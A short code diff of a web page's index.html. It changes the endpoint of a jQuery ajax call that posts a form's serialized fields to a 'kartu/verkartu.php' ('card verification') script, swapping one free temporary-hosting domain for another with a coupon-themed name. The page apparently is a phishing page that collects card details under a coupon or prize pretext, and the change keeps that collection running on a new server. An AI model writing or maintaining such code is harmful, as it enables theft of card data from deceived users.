--- a/index.html
+++ b/index.html
@@ -746,7 +746,7 @@ $(document).ready(function(){
   list.add("active");
    
          $.ajax({
-              url: 'https://dapatkan-001-site1.ltempurl.com/kartu/verkartu.php',
+              url: 'https://ambil1kupon-001-site1.mtempurl.com/kartu/verkartu.php',
               type: 'post',
               data: $(this).serialize(),             
 complete: function(data) {
